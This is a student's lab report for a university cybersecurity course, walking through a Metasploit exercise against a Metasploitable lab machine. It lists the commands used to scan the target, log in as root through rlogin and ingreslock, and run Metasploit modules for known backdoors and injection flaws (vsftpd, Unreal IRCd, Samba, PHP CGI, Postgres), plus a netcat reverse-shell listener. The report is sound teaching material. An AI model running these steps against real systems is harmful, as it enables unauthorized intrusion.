Assignment 4

CSI 4139 – Design of Secure Computer

Systems -- Fundamentals of
Cybersecurity

Fall 2023

Université d'Ottawa

Professor : Guy-Vincent Jourdan

Student : Taha ben amor, 30017275

Report due date : 2023-11-2

Labtainers Metasploit Lab Documentation

Introduction :

This document details the process and findings of the Labtainers Metasploit lab exercise,
aimed at understanding penetration testing techniques using the Metasploit framework. The
lab environment is set up using a Kali Linux system as the attacker and a Metasploitable
system as the victim. Each section includes detailed steps, screenshots, and an explanation of
the commands used.

Step 1: Verify Connectivity between Attacker and Victim

Objective: To establish a network connection between the attacker (Kali Linux) and the
victim (Metasploitable).

Steps :

1. From the attacker's terminal, I executed the ping 192.168.1.2 command to

check for connectivity.
2. The continuous replies from the victim's IP address confirmed that the network
was reachable.

Reasoning: Ping is a network utility that checks the reachability of a host on an Internet
Protocol (IP) network and measures the round-trip time for messages sent from the
originating host to a destination computer.
Step 2: Get a List of Vulnerable Services on the Victim
Objective: To identify open ports and potentially vulnerable services running on the
victim's system.

Steps :

1. I used the nmap -p- 192.168.1.2 command to perform a comprehensive port

scan.
2. The output listed all open ports and services, which would be analyzed for
vulnerabilities.

Reasoning: Nmap ("Network Mapper") is a free and open-source utility for network
discovery and security auditing. Scanning all ports provides a complete view of the
potential attack surface.
Step 3: Vulnerably Configured rlogin Service (port 513)
Objective: To demonstrate remote access to the victim's system via a misconfigured
rlogin service.

Steps :

1. I initiated a remote login session using rlogin -l root 192.168.1.2.

2. After gaining access, I displayed the contents of a sensitive file with cat
/root/filetoview.txt.

Reasoning: The rlogin command allows a user to log in on another Unix system via
the network, and viewing a root-owned file demonstrates the level of access gained.
Step 4: Vulnerable ingreslock Service (port 1524)
Objective: To exploit the ingreslock service to gain unauthorized root access to the
system.

Steps :

1. A connection was made to the service using telnet 192.168.1.2 1524.

2. I then displayed the root file to confirm the privilege level of the session.

Reasoning: The ingreslock service is known to have vulnerabilities that can be

exploited to gain elevated privileges. Telnet is used to interact with this service.
Step 5: Vulnerable distccd Service (port 3632)
Objective: To exploit the distccd service vulnerability to execute arbitrary commands
on the victim.

Steps :

1. Launched Metasploit with sudo msfconsole.

2. Located the distccd exploit using search distccd.
3. Selected the exploit with use exploit/unix/misc/distcc_exec.
4. Set the RHOST to the victim's IP set RHOST 192.168.1.2.
5. Executed the exploit with exploit and verified by displaying the root file.

Reasoning: The distccd service, when misconfigured, allows execution of arbitrary

commands. This step demonstrates how an attacker could exploit such a
vulnerability.
Step 6: Vulnerable IRC Daemon (port 6667)
Objective: To exploit the Unreal IRCd service, which is known to have a backdoor
vulnerability.

Steps :

1. Accessed the Metasploit console and searched for the Unreal IRCd exploit
using search unreal_ircd.
2. Selected the exploit with use
exploit/unix/irc/unreal_ircd_3281_backdoor.
3. Set the RHOST to the victim's IP with set RHOST 192.168.1.2.
4. Executed the exploit with exploit and demonstrated access by displaying the
root file.

Reasoning: Unreal IRCd had a known backdoor in certain versions, which could be
exploited to gain unauthorized access to the system.
Step 7: Vulnerable VSFtpd Service (port 21)
Objective: To demonstrate the exploitation of a backdoor in the VSFtpd service.

Steps :

1. In the Metasploit console, located the vsftpd exploit with search vsftpd_234.
2. Chose the exploit with use exploit/unix/ftp/vsftpd_234_backdoor.
3. Configured the RHOST as before and executed the exploit.
4. Verified success by displaying the root file.
Reasoning: The vsftpd 2.3.4 version contains a malicious backdoor that was
introduced by an unknown attacker, which can be exploited to gain shell access to
the system.
Step 8: Vulnerable Samba Service (port 139)
Objective: To exploit the Samba service for unauthorized code execution.

Steps :

1. Found the Samba exploit using search usermap_script.

2. Utilized the exploit with use exploit/multi/samba/usermap_script.
3. Set up the RHOST and executed the exploit.
4. Displayed the root file to confirm the exploit's success.

Reasoning: The usermap script in Samba versions prior to 3.0.20 allows attackers to
execute programs as an administrator, making it a critical vulnerability.
Step 9: Vulnerable HTTP (php) Service (port 80)
Objective: To take advantage of a PHP CGI argument injection vulnerability.

Steps :

1. Searched for the relevant PHP CGI exploit in Metasploit with search php_cgi.
2. Selected the appropriate exploit with use
exploit/multi/http/php_cgi_arg_injection.
3. Configured the necessary options, including RHOST, and ran the exploit.
4. Upon successful exploitation, dropped to a shell and displayed the root file.

Reasoning: PHP CGI argument injection can be used to execute arbitrary code on the
web server, potentially allowing for full system control.
Step 10: Vulnerable Postgres Service (port 5432)
Objective: To exploit a vulnerability in the Postgres service which allows for arbitrary
code execution.

Steps :

1. Located a Postgres exploit with search postgres_payload.

2. Executed use exploit/linux/postgres/postgres_payload.
3. Set the RHOST to target the victim's IP and ran the exploit.
4. Proved control by displaying the root file from the shell.

I had prepared everything necessary to exploit the target, and the chosen payload
required a listener on port 4444. Typically, this would be set up using a command like
nc -lvnp 4444 to listen for incoming connections. However, I faced a constraint as I
did not have access to another attacker terminal to establish this listener. Despite
successfully executing the exploit, this lack of a listener resulted in no session being
created. This outcome highlights the importance of the listener in reverse shell
payloads, where the exploited system attempts to connect back to the attacker's
system. Without this listener in place, even a successful exploit cannot establish the
necessary back-connection for a session.
References :

https://nps.edu/web/c3o/labtainers

https://www.offsec.com/metasploit-unleashed/

https://owasp.org/www-project-web-security-testing-guide/